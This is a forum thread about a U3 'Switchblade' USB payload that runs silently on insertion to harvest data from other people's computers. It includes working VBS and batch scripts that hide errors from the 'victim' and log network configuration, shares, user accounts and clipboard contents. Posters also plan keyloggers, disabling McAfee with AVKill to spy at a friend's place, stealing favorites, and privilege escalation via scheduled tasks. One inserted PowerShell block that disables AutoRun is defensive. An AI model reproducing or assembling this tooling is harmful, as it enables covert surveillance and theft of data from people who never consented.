
~Gozor~ Finished Payload


setzer1411


Any chance for an update of the Config tool with an extra check box with which you can enable/disable your own addition?

I'd like to add a keylogger remote install package, but make it nicely switchable from the config menu like all the other items.

I can modify the needed scripts to add my tool and check for the *.dat file, but I can't alter the Config tool.

Having said that; I have a feature suggestion.

We don't all remember to hold the shift key when inserting our U3s in our PCs, and we don't all want to disable autorun all the time.

I'm not happy with 'accidentally' infecting myself every time and would like an option (a simple check box would do) that makes installing hacks run only once or every time.

An alternate method I think would be to modify the Go.bat to delete the 2.dat and 3.dat files after the execution of the appropriate section so that upon reinsertion the flag now shows not to install the hacks (but that kills the option to mass infect PC's).

Any comments?
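From the defender's side of the "accidentally infecting myself" problem above: the U3 stick works because Windows AutoRun launches autorun.inf from the emulated CD-ROM partition on insertion, and holding shift only suppresses that for one insertion. The policy that turns it off permanently is the NoDriveTypeAutoRun value in the Explorer policies key. The script below is an added example, not part of this thread or GonZor's package; it audits that value and sets it to 0xFF (AutoRun off for every drive type, which covers both the U3 CD-ROM partition and the flash partition). The key and value names are the real Windows policy locations; the HonorAutorunSetting value is the one Microsoft KB 967715 introduced for XP/2003 so that NoDriveTypeAutoRun is honoured. Run it from an elevated PowerShell prompt.

```powershell
# Added example (not from this thread): audit and enforce the AutoRun policy
# that stops a U3 CD-ROM partition or a removable drive from launching
# autorun.inf on insertion. Needs an elevated prompt to write HKLM.

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'

# Bit meanings of NoDriveTypeAutoRun: 0x04 removable, 0x08 fixed,
# 0x10 network, 0x20 CD-ROM, 0x40 RAM disk. 0xFF disables AutoRun everywhere.
$DisableAll = 0xFF

# A U3 device exposes a CD-ROM partition (bit 0x20) and a removable
# partition (bit 0x04); both bits must be set for the device to stay inert.
$U3Bits = 0x24

function Get-AutoRunPolicyValue {
    # Returns the raw DWORD, or $null when the policy has never been set.
    $item = Get-ItemProperty -Path $PolicyKey -Name 'NoDriveTypeAutoRun' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.NoDriveTypeAutoRun
}

function Test-U3AutoRunBlocked {
    # True only when both drive types a U3 stick presents are covered.
    $value = Get-AutoRunPolicyValue
    if ($null -eq $value) { return $false }
    return (($value -band $U3Bits) -eq $U3Bits)
}

function Set-AutoRunDisabled {
    if (-not (Test-Path $PolicyKey)) {
        New-Item -Path $PolicyKey -Force | Out-Null
    }
    New-ItemProperty -Path $PolicyKey -Name 'NoDriveTypeAutoRun' `
        -PropertyType DWord -Value $DisableAll -Force | Out-Null
    # KB 967715: on XP/2003 this value makes Windows honour NoDriveTypeAutoRun.
    New-ItemProperty -Path $PolicyKey -Name 'HonorAutorunSetting' `
        -PropertyType DWord -Value 1 -Force | Out-Null
}

# --- audit, then enforce if needed ---
$before = Get-AutoRunPolicyValue
if ($null -eq $before) {
    Write-Host 'NoDriveTypeAutoRun is not set; the Windows default applies.'
} else {
    Write-Host ('NoDriveTypeAutoRun is currently 0x{0:X2}' -f $before)
}

if (-not (Test-U3AutoRunBlocked)) {
    Write-Host 'AutoRun is still enabled for CD-ROM and/or removable drives; disabling.'
    Set-AutoRunDisabled
}

if (Test-U3AutoRunBlocked) {
    Write-Host ('AutoRun policy now 0x{0:X2}; CD-ROM and removable AutoRun are blocked.' -f (Get-AutoRunPolicyValue))
}
```

The check is deliberately a bit test rather than an equality test against 0xFF: an environment that ships its own policy (for example 0x95, the value Group Policy writes for "Turn off Autoplay: all drives") still passes as long as the CD-ROM and removable bits are set. A sign-in or Explorer restart is needed for a changed value to take effect.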


Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . .

    * 1. Extract the ISO to the root of your flash drive.

    * 2. Edit the AUTORUN.INF

    * 3. Run SBConfig from your flash drive.

After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?


Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . .

    * 1. Extract the ISO to the root of your flash drive.

    * 2. Edit the AUTORUN.INF

    * 3. Run SBConfig from your flash drive.

After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working?

No, sbconfig is only used to customize the payload (e.g. turn options on or off). If you remove sbconfig.exe the payload will still function the way it is set up, but I recommend keeping a copy of sbconfig somewhere in case you need to configure the payload again.


GonZor, I was just wondering if you knew anything about ".job" files or their file format or anything. A few of my buddies are working on a Windows hack that works in a limited account, and so far it works but just crashes in a limited account. Anyways, the hack uses the "System" Login Exploit using an At Command etc. If you would like to help us work on this, send me a message.


GonZor, I was just wondering if you knew anything about ".job" files or their file format or anything. A few of my buddies are working on a Windows hack that works in a limited account, and so far it works but just crashes in a limited account. Anyways, the hack uses the "System" Login Exploit using an At Command etc. If you would like to help us work on this, send me a message.

You can't use the AT command from a limited account; that would be why it is crashing. Basically you are trying to elevate your privileges using an exploit that needs elevated privileges... You need to find another way to elevate your privileges.


It would be much easier for me to explain this to you via messenger, but if you're uncomfortable with that I will attempt to elaborate.

Basically, since you can't do an At command in limited user, we made a ".job" already made to do that and detect the time and run a minute later. The problem is that the scheduled task creates and it looks completely legit and you can see it in the scheduled tasks folder and such, but it never executes, not even as an admin. And I believe that we need to know about ".job" files. I can send you sources and such if you believe you can help us; I have many messengers you can reach me at.


I made some updates to your scripts, nice job btw.

go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error, so I've added code to skip a: and b: and error handling that just keeps chugging if it hits a problem, better than crashing and posting a dialog to the user/victim.

I've included only what's different; otherwise I'm over the max characters for a message:

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next

strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

For Each objDrive in colDrives
    'ignore floppy drives - reserved by BIOS if they don't exist
    If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
        If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
            strfd = objDrive.DriveLetter & ":"
        End If
        If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\go.bat") Then
            strU3 = objDrive.DriveLetter & ":"
        End If
    End If
Next

If objFSO.FileExists(strfd & "\System\SRC\PL.dat") Then
    objShell.Run strU3 & "\System\SRC\go.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False
End If

If objFSO.FileExists(strfd & "\System\SRC\U3.dat") Then
    objShell.Run ".\LaunchU3.exe -a"
End If

go.bat

I've added nircmd to grab the clipboard contents, and winaudit (google it).

:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off

If %computername%.==. SET computername=computer
If %username%.==. SET username=None

SET fd=%1\System
SET U3=%2\System\SRC

CD %U3% >NUL

:: SET LOG PATHS
    IF NOT EXIST %fd%\Logs\%computername% (
        MD %fd%\Logs\%computername%
        )

    SET logdir=%fd%\Logs\%computername%
    SET log="%fd%\Logs\%computername%\%computername%-[%3-%4].log"
    SET tmplog="%fd%\Logs\%computername%\%computername%_TEMP.log"
    SET include="%fd%\SRC\Include\
    SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
    SET /p winaud=<"%1\System\SRC\Include\winaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%0.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +           [System info]          + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
        IPCONFIG /all >> %log% 2>&1

    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +              Shares               + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
        net share >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +              Users                + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
        net user >> %log% 2>&1
    )

IF EXIST %include%19.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +            Clipboard              + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
        .\nircmd.exe clipboard addfile %log%
    )

IF EXIST %include%20.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo +            Win Audit              + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
            ECHO WinAudit saved to %logdir% >> %log% 2>&1
            .\WinAudit.exe %winaud% /f=%logdir%\WA_%computername%[%3-%4] /f=%logdir%\WA_%computername%[%3-%4].txt >> %log% 2>&1
            ECHO. >> %log% 2>&1
    )

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
    EXIT

winaud.dat (RTFM for WinAudit to see what the switches do):

/r=oxutn /o=PDF /m=CA Security Scan

Also, for the EIP I use

http://checkip.dyndns.org/

You could use regular expressions to remove the extra HTML,

<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>

but it gets the job done and uses a public server.

Take a look at nircmd if you haven't already; it does a lot of nice things with the registry and such, and could automate things more smoothly. It'll also allow you to beep the speaker at a given frequency and length. Three quick 2600 Hz tones at the end of the script could tell you when to pull out. ;)


Hmm.. this is really good stuff, nice job on improving on what already seems to be an Ace tool.

I'll attempt to implement all the changes myself and add my own little keylogger to it as well.

Any chance you might upload your full scripts somewhere for us to leech?

(I, as a noob at scripts with zero knowledge of vbs, would like to see if I got the implementation right... I'm learning).


Nice code


Thanks a bunch. I got pretty far on my own but definitely needed your help.

I like the multitone beeps, I just had three single 2600Hz chimes.

Now I also think I figured out how to make the payload run files from the FD, something my keylogger will be most grateful for :)

The only other changes I made were to add a search history backup and make most outputs in HTML format (looks so much better).

The only (Nir)tool that didn't have command line options was the favorites backup... but I mailed him asking for an update to that (don't know any other way to steal favorites).

You're a sport!


Complicated even is too complicated to spell for me :-?

Na, as a real noob I can copy stuff, copy paste stuff and delete stuff. I can think, but I cannot create.

Another small addition I made (read: copy paste) is to add avkill to the package. McAfee keeps bugging me when trying to spy, so it's gotta go.

avkill now runs first; next time I'm at my friend's place (where I also got the drive error btw) I'll see if I can beat McAfee on the draw and check if the drive issue is gone. Should be another two hurdles taken, I think...


Seeing as batch files are wonderful things in and of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission, I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.


Seeing as batch files are wonderful things in and of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission, I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

Firstly, nice work on modifying the payload. Secondly, the way I see the USB Hacks section is as a community project where people build upon others' ideas to create something bigger and better. I doubt anyone would object to you rewriting the batch files in vbs. Once you're done let me know, and with your approval it may make its way into the payload. Also, if you get stuck I can help.


If I could just get around the AV issue it would be perfect. Also, I have been wondering about the code... I noticed one of the other projects had the run disabled if "safety.txt" was on the C drive (goto end) and I can't see that anywhere in the code (or am I missing it?). Hold in mind, guys, I'm just getting the hang of this.


I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.

@HarshReality

The AV is typically killed using AVKill, but some antivirus are immune or will countermeasure.

Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.

The 2 ways I know to keep from scanning yourself:

1. checks for presence of file "X"

2. checks computername/user against list stored in file on U3

Personally I would go with 1: less of a paper trail, lest you lose your switchblade, but it requires access to the machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting the U3 drive.


Ok. I've been trying to get this to work for about a week or two now, and progress is null. I'm not a complete newb at using the payloads, just installing them. Now, I get all the files extracted, and replace the u3custom ISO in the bin folder from GonZor's package, then run the customizer. It formats the drive with the files on the CD partition and I eject the drive and replace it, then I move the SBConfig file to the Flash part, and run it. It works. Now my issue is, when the Switchblade is used on another computer, it doesn't run. It still works through the Amish technique, and I end up with a successful log, but is there some extra file that was left out of a zip file, or something?


Do you have the payload on (there's a button to turn the whole payload on and off at once) and hidden and system files viewable on the machine you're accessing the logs on (you're looking in the System folder for the logs, right?)?

If you have those all correct, can you provide me with the following information?

Your PC:

OS

Version of the payload and sbconfig

Test PC:

OS

Autorun disabled (Yes/No)


Yep. All the files are set up in the correct structure.

Hidden files are shown, and the logs are in the System folder.

My PC:

Windows XP MCE 2005

Um...define payload. As in Universal Customizer? Then in that case, 1.0.0.8

SBConfig: 2.0.0.18

Test PC:

Windows XP Home

Autorun enabled

At the start of this thread, I know there is a post showing all the files that are needed for this to run. Now I'm sure that post is outdated, as new files may have been made, but I noticed a "Start.bat" file in that list that needs to be in the original version of that payload. Should I have that?


Hi,

this was actually the first payload I ever tried. I was a bit afraid, cuz I read that it is supposed not to be possible to install it through VM systems. But the only available XP system was my VM. And I got it to run without a single problem. I am so happy that I just wanted to let you know :-) and that I really, really like your work!! THUMBS UP!!

What really feels handy is the option to turn U3LP on/off and turn the payload on/off

Would it also be possible to turn the u3 functionality on/off?

The idea behind it is that I ran into a situation where I simply wanted to use my stick as a storage stick, but the host PC didn't even recognize my stick, cuz of the restricted accounts or whatever they did to it that didn't allow the u3 partition to run, which stopped the whole stick from being recognized.

Cuz of me being more into economics than writing code, I don't know if it is possible.
